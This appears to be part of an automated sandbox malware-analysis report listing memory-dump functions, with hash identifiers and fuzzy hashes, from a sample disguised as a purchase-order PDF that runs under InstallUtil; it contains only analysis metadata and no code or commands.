                                          • Source File: 00000000.00000002.2262594537.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7e40000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b2a8350f7c16de7b9638dfd622028e16a34e45d085a0da6fc95f1b86098d76d
                                          • Instruction ID: 6a542ad9c4f6100b48ea32981cf452fbbffce87914026a32b0317fe0fb18434d
                                          • Opcode Fuzzy Hash: 7b2a8350f7c16de7b9638dfd622028e16a34e45d085a0da6fc95f1b86098d76d
                                          • Instruction Fuzzy Hash: 6DE0C9B4E0520CEFCB44DFA8D5446ACFBF4EB89300F10C5AA9C4893340D6359A51DF44
                                          Function 07E55C10 Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2262594537.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7e40000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b2a8350f7c16de7b9638dfd622028e16a34e45d085a0da6fc95f1b86098d76d
                                          • Instruction ID: ae9e1d87ceb59e9ce65f9490c34b92f4ac10511a3f3cebef3cefc39481d42773
                                          • Opcode Fuzzy Hash: 7b2a8350f7c16de7b9638dfd622028e16a34e45d085a0da6fc95f1b86098d76d
                                          • Instruction Fuzzy Hash: DDE0C9B4E0520CEFCB44DFA8D5456ACBBF5EB49300F10C5A99C1993340D6359A51DF50
                                          Function 0332FF38 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2237598471.0000000003320000.00000040.00000800.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3320000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 316c0ff0108b8554dad6be2d7b97fadf4df4171496aa86f04bf963ac02d3a353
                                          • Instruction ID: b62825359e38dc86eb781e0ea46a0243a532ee5aec853677aa2fdee787833a3f
                                          • Opcode Fuzzy Hash: 316c0ff0108b8554dad6be2d7b97fadf4df4171496aa86f04bf963ac02d3a353
                                          • Instruction Fuzzy Hash: 71E08674908218EBCB04DF94E840A7DFFBCAB46301F14C2A9DC4857341C6319F42DB90
                                          Function 07E58758 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2262594537.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7e40000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 07beb8bf1717bee066491adb807f7ffb9ecd7d6524da98b3744f19eadb5ca684
                                          • Instruction ID: b96c250b4a7190cddc1f8c40cdb5c040612628763e6b4f0d91bca6a8793da1c0
                                          • Opcode Fuzzy Hash: 07beb8bf1717bee066491adb807f7ffb9ecd7d6524da98b3744f19eadb5ca684
                                          • Instruction Fuzzy Hash: 1CE01A74D0520CABCB04DF99D4406ACBBB8AB49204F1081A98C5893341D6359A82DF80
                                          Function 07E5E198 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2262594537.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7e40000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a561267ba1d96ffa0e7fab675c3a627c8e53c0dfa538566005e38c54654ef3e2
                                          • Instruction ID: 18e1aa5e5a5ff405f266b050fd5590c129b9b73bd3251b7847acd8db021a5f15
                                          • Opcode Fuzzy Hash: a561267ba1d96ffa0e7fab675c3a627c8e53c0dfa538566005e38c54654ef3e2
                                          • Instruction Fuzzy Hash: 71E0EC7490920CDBCB04DF94E9456ACBBB9AB46304F1091D98C081B381CA719F86DB81
                                          Function 07E5B220 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2262594537.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7e40000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 92b1dadddf0caf0687798529b8136d9b885cfb7168b982ad23bf30d41267b3f4
                                          • Instruction ID: 4eb64a8d6ca7ab2b8c2232c122dc442faea410872b40a6192e7ee6aaa8be737e
                                          • Opcode Fuzzy Hash: 92b1dadddf0caf0687798529b8136d9b885cfb7168b982ad23bf30d41267b3f4
                                          • Instruction Fuzzy Hash: 65E012F190220CEBCB10EFF4D40569E7BA8EB46200F0055A9950597110EE714F409B96
                                          Function 0332EA10 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2237598471.0000000003320000.00000040.00000800.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3320000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 39d346f668777744e75a8164a8eb28c8b67287c3a79e7e6b7d91a8755d8c9655
                                          • Instruction ID: 5f1cee2aa7bb32c863dc5b643676b286bb4734ae540d7a87b9b2c32552e0a489
                                          • Opcode Fuzzy Hash: 39d346f668777744e75a8164a8eb28c8b67287c3a79e7e6b7d91a8755d8c9655
                                          • Instruction Fuzzy Hash: 09E012B190120CEBCB00FFF5D90966EBBB8EB46201F0055A5D50993110EF755F549B96
                                          Function 07E5E5A8 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2262594537.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7e40000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80f4e9d54455b98d77141798b5fd5e7fd71bfc15965f12c167171b132e7fea79
                                          • Instruction ID: dd9c7419b724065098199c2cff40a6ae062ce6cffebe9a93c32073a1e1afb176
                                          • Opcode Fuzzy Hash: 80f4e9d54455b98d77141798b5fd5e7fd71bfc15965f12c167171b132e7fea79
                                          • Instruction Fuzzy Hash: A7C02BF104BB4C83C3043744740C370329CC303705F0038005C0E020A0D7B846C0CE44
                                          Function 03321007 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2237598471.0000000003320000.00000040.00000800.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3320000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f22535d658af77aeb06d80a082ef66ee03c1c72bfc50ec9cd1c06bbd63149530
                                          • Instruction ID: abd55ab7bfeffdb78cbea62afec9c8faea811593a3123547e05f66b9a10d88de
                                          • Opcode Fuzzy Hash: f22535d658af77aeb06d80a082ef66ee03c1c72bfc50ec9cd1c06bbd63149530
                                          • Instruction Fuzzy Hash: CED05E36900121CAD708DF09D9D41AAFBF8FF08702F4A80A8DD4567104D330FA068A81
                                          Function 0332E840 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2237598471.0000000003320000.00000040.00000800.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3320000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eca9cc3559e26552ec6043abe95fcf06e9b547f3c510728c3ff6adac6fefddfd
                                          • Instruction ID: cd84e6e68664886a77694c2356d6467917264c3684e4b99ac1bd94dd3ead4332
                                          • Opcode Fuzzy Hash: eca9cc3559e26552ec6043abe95fcf06e9b547f3c510728c3ff6adac6fefddfd
                                          • Instruction Fuzzy Hash: 4EC02BB0000F1883CB00F7E8784E338B75C1B41603F060008D80C104008FBC90C0CEBB
                                          Function 03320878 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2237598471.0000000003320000.00000040.00000800.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3320000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e0bfca115e6ec16d8ccab41c79485310852c91dda08968e61b0d26129ef9042
                                          • Instruction ID: 9a609e59d29b11e507d9057d32591427fc9cbde506ef2eeb7c20c23a560321eb
                                          • Opcode Fuzzy Hash: 4e0bfca115e6ec16d8ccab41c79485310852c91dda08968e61b0d26129ef9042
                                          • Instruction Fuzzy Hash: CDC08C9C707E902BCF07A2B8A8B9ABE2F949BC3221B00089EC4C28F186D9084409C702
                                          Function 033208A1 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2237598471.0000000003320000.00000040.00000800.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3320000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51e85200bcbb055d81dc743586fda78375e0acc6c7d64eb786171f78439c6d27
                                          • Instruction ID: fb80b971963679f807e2952e02012ded703cc79ade5910442e0f5db7610b2503
                                          • Opcode Fuzzy Hash: 51e85200bcbb055d81dc743586fda78375e0acc6c7d64eb786171f78439c6d27
                                          • Instruction Fuzzy Hash: B4C09BFD411505FFC7505570F8957CE773CFB55107F1245169445A1507D93540018940
                                          Function 033208B0 Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2237598471.0000000003320000.00000040.00000800.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3320000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c3cd512651752478a6cc21e5f77276175e1c28d659da84a925a0c46c60627c46
                                          • Instruction ID: 2f364be442322f823f3d38f1e1df9992d38d27ee4c04f8b924be68ab18a8b667
                                          • Opcode Fuzzy Hash: c3cd512651752478a6cc21e5f77276175e1c28d659da84a925a0c46c60627c46
                                          • Instruction Fuzzy Hash: 06900231045F0DCB46403795780955EB75CE6459167804051A55D515075A6964104595

                                          Non-executed Functions

                                          Function 07E5E1D8 Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2262594537.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7e40000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2664e740c04ceefa306bd69e9934c5fda722f8be3711e7f37621aab0dd638c34
                                          • Instruction ID: 9d0e5e508b08715a5e8a7ee14ea629d51d1804a3bf3f3c87796df5a87e369566
                                          • Opcode Fuzzy Hash: 2664e740c04ceefa306bd69e9934c5fda722f8be3711e7f37621aab0dd638c34
                                          • Instruction Fuzzy Hash: AF8119B4D0621CCFDB24DFAAD4447EDBBB6BF8A314F10A0A9C809AB255D7745A85CF00
                                          Function 0332AE80 Relevance: .2, Instructions: 171COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2237598471.0000000003320000.00000040.00000800.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3320000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b258783a2895cf973a265db10b7d13aefa5ed21fee679da4abc604ce63fae9c
                                          • Instruction ID: cb2eedd3e958e020453cc0e54db7936553d9cc99c436a76f4b43f6097ca60450
                                          • Opcode Fuzzy Hash: 9b258783a2895cf973a265db10b7d13aefa5ed21fee679da4abc604ce63fae9c
                                          • Instruction Fuzzy Hash: DE710D70E01A099FEB48DF6AE8416AABBF6FBC8300F14D12DD0159B26ADF791805CB50
                                          Function 0332AE90 Relevance: .2, Instructions: 165COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2237598471.0000000003320000.00000040.00000800.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3320000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c314d0951459c0f8058f376505d4447444ad4be83ed8dd6cd813a2d23debbd72
                                          • Instruction ID: 0d2f75cacfc9c74c2ce97715181f44e6363adbba8f2083ce8bf2e1908f51b568
                                          • Opcode Fuzzy Hash: c314d0951459c0f8058f376505d4447444ad4be83ed8dd6cd813a2d23debbd72
                                          • Instruction Fuzzy Hash: 5871FE70E01A099FEB48DF6AE8416AABBF7FBC8300F14D12DD0159B26ADF791905CB50
                                          Function 0332B4D8 Relevance: .1, Instructions: 101COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2237598471.0000000003320000.00000040.00000800.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3320000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 575b94f90c4280f2d8aaa2e4f099f740276c6bdf21bbd270b7981192ec55700b
                                          • Instruction ID: b2135fb29c8305fe6f0f20e6fb9f69e00cbdfdb64dd68574e3a0651f89572591
                                          • Opcode Fuzzy Hash: 575b94f90c4280f2d8aaa2e4f099f740276c6bdf21bbd270b7981192ec55700b
                                          • Instruction Fuzzy Hash: 6B4197B4D056288FEB68DF66D859799FBF6AF88300F14C1E9C40DA6264DB754A85CF00
                                          Function 07E40040 Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2262594537.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7e40000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33726534355b38d837e532c5ec43542c0d676e4bf854c25fc013a2b56bc6fb5f
                                          • Instruction ID: 27a5e6c70a103f39a147cbdd2be2f4303ff43627c147b12fea1a1429dbfc9021
                                          • Opcode Fuzzy Hash: 33726534355b38d837e532c5ec43542c0d676e4bf854c25fc013a2b56bc6fb5f
                                          • Instruction Fuzzy Hash: 7B210CB1E056598BEB2CCF5B98447DAFAF6AFC9300F04D0FAD51CA6254EB740A858F01
                                          Function 07E4003F Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2262594537.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7e40000_PO#8329837372938383839238PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d66050a88748e153789612863154705ca19210b99fa3d116c4f565ac0d78426c
                                          • Instruction ID: 1bb35481b0f475f2079a95fcf3eed10172c398a212ade2bec8c268cbef4f565d
                                          • Opcode Fuzzy Hash: d66050a88748e153789612863154705ca19210b99fa3d116c4f565ac0d78426c
                                          • Instruction Fuzzy Hash: 00210EB1D016598BEB2CCF6B9C4479AFAF7AFC8300F04C0FA951CA6254EB740A858F01

                                          Executed Functions

                                          Function 009B0ECC Relevance: 1.5, Strings: 1, Instructions: 297COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3397324481.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_9b0000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Ij
                                          • API String ID: 0-1760422038
                                          • Opcode ID: 4d5aff8dd6c759634ac86fdddf1be2b17298b8621505719b22a1a53ec0a00783
                                          • Instruction ID: f2220169353c6df296508e358760a859bc6d9c26712a4e99019c6abdb09cff84
                                          • Opcode Fuzzy Hash: 4d5aff8dd6c759634ac86fdddf1be2b17298b8621505719b22a1a53ec0a00783
                                          • Instruction Fuzzy Hash: 96A1C035F08218DBDB489F7888646BE7BB7BFC8720B14846EE106E7394DE349C019B91
                                          Function 009B12D1 Relevance: .5, Instructions: 523COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3397324481.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_9b0000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c50e86e8dc171bed7fd0567ee4fa5246e7f0d2a4f1139e99a68a43015d637818
                                          • Instruction ID: 198979f15e2068ebd240b716e2dd4400e7291849bc1c38f0765df4bcd84eaff1
                                          • Opcode Fuzzy Hash: c50e86e8dc171bed7fd0567ee4fa5246e7f0d2a4f1139e99a68a43015d637818
                                          • Instruction Fuzzy Hash: DC31AE34A00249DFDB06EBB8D855AADBFB2FF86300F2055ADD005A735ADB746A41CF51
                                          Function 009B0BD8 Relevance: .2, Instructions: 207COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3397324481.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_9b0000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 848f883c26661aafc84728ad55ddc2282f34ec5c001bc25afb559fa40d43f91e
                                          • Instruction ID: 57b0bc9223d0c48f18309fb659196d833cce40d8fa7f492955764f14e1dcdfb9
                                          • Opcode Fuzzy Hash: 848f883c26661aafc84728ad55ddc2282f34ec5c001bc25afb559fa40d43f91e
                                          • Instruction Fuzzy Hash: 7071A230B106458FDB45EB78D869A6E7FA2FFC5310B10552DE106DB3A9DF74AC018B81
                                          Function 009B0BC8 Relevance: .1, Instructions: 123COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3397324481.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_9b0000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 206dbde228c0f9782935edb6f18a195d5c433f2af8b68dcfb0199879530af51a
                                          • Instruction ID: af9250af3ef1b953f1768a258d2dbcfbf3c19db29a2372b1ec9483fbdb2dbf5b
                                          • Opcode Fuzzy Hash: 206dbde228c0f9782935edb6f18a195d5c433f2af8b68dcfb0199879530af51a
                                          • Instruction Fuzzy Hash: 2141A270A146018FDB09EB78E86956E7FA2FBC53017106A3DD0568B3A9DFB4AD058F81
                                          Function 009B1771 Relevance: .1, Instructions: 102COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3397324481.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_9b0000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 479252c98fe054b4522e2abaaafed1133ac1886b91901853a456b85b48c15d98
                                          • Instruction ID: b75f2860e8fa4a9fb18b6584efc0056cda0d20882bf8ebf5ef72b6c86cd31fab
                                          • Opcode Fuzzy Hash: 479252c98fe054b4522e2abaaafed1133ac1886b91901853a456b85b48c15d98
                                          • Instruction Fuzzy Hash: E431C030F04208DFDB04EBF8886526EBFAAEFC9310F10446DE50AD7396DE7459068BA1
                                          Function 009B0DD0 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3397324481.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_9b0000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efe9317b7718a7929989a16b5ff6e5fb2e33efd56425ec64b7ce2d3de16caa66
                                          • Instruction ID: c741b6c9a1ba35dc1d51c6e22a92e5f242ee66c0b99cd4fe21ca344ba6f6b7df
                                          • Opcode Fuzzy Hash: efe9317b7718a7929989a16b5ff6e5fb2e33efd56425ec64b7ce2d3de16caa66
                                          • Instruction Fuzzy Hash: 48217734B501159FCB44DB78D859B6E7BB6FFC8710F244468E506EB3A6CA719C018B91
                                          Function 009B1660 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3397324481.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_9b0000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fee329e0769f95f162a15baf736779de5d98651272921491a5e5a2a1641c2963
                                          • Instruction ID: 8747b00899699e0975f5fec2d259091cf3fd427d5e3beb997b5c941d69185a67
                                          • Opcode Fuzzy Hash: fee329e0769f95f162a15baf736779de5d98651272921491a5e5a2a1641c2963
                                          • Instruction Fuzzy Hash: 10219C34E0020ADFDB05EBB8D8506AEBBB6FFC5300F205569E105A7309EB716A40CF90
                                          Function 009B0CC2 Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3397324481.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_9b0000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bbd1308be6eb36a1a37622a7a25edfff20f04c5efc38827a542528951bcdb712
                                          • Instruction ID: c88df5a7e32c6bb581b2898189cc6adb87c3b07249c4692c0dbe1bbca2a452c9
                                          • Opcode Fuzzy Hash: bbd1308be6eb36a1a37622a7a25edfff20f04c5efc38827a542528951bcdb712
                                          • Instruction Fuzzy Hash: E0219231B00B404BDA69AB7D881416EBAE2FFC52147009D3DD167CB680DF759D058BC2
                                          Function 009B0901 Relevance: .1, Instructions: 66COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3397324481.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_9b0000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 92754e5d60e786799b42eca3cf792e5b111d6df7023010ce32c96dff107c2ffd
                                          • Instruction ID: 3bd92dc85dc1a205db1cc09f2310a3605141579cfaa445ec3d55fb2944286b94
                                          • Opcode Fuzzy Hash: 92754e5d60e786799b42eca3cf792e5b111d6df7023010ce32c96dff107c2ffd
                                          • Instruction Fuzzy Hash: FB219F30E09244CFDB18EBB8C5656AE7FF6AF84300F1445AEC449DB696DB345D05CB81
                                          Function 009B0838 Relevance: .0, Instructions: 47COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3397324481.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_9b0000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2baa3774d4a6ad42537919efed96ba52f202c0acf10962bf942d13cafb30d729
                                          • Instruction ID: 1ea19deb416a40927b189f7bc3610c271f62429094b957c93d826b024f927845
                                          • Opcode Fuzzy Hash: 2baa3774d4a6ad42537919efed96ba52f202c0acf10962bf942d13cafb30d729
                                          • Instruction Fuzzy Hash: C2114F74555646CFCB06EF28F8A4A453FB1FB86300B10BA9DD1049B22EDAB47D05CF80
                                          Function 009B0848 Relevance: .0, Instructions: 38COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3397324481.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_9b0000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ade00c301cad92ea529c3785a0b429574777fed34679027827f6dbd2ca27d9d6
                                          • Instruction ID: 35106e0e617d10ac39ad5a3db3e9e16569ae3fce1f677357d667ea72d178b2e5
                                          • Opcode Fuzzy Hash: ade00c301cad92ea529c3785a0b429574777fed34679027827f6dbd2ca27d9d6
                                          • Instruction Fuzzy Hash: 2F011774650A0ADFDB0AFF2CF894A493BB5FB81304B10BA5CD1049B32DDAB579059F80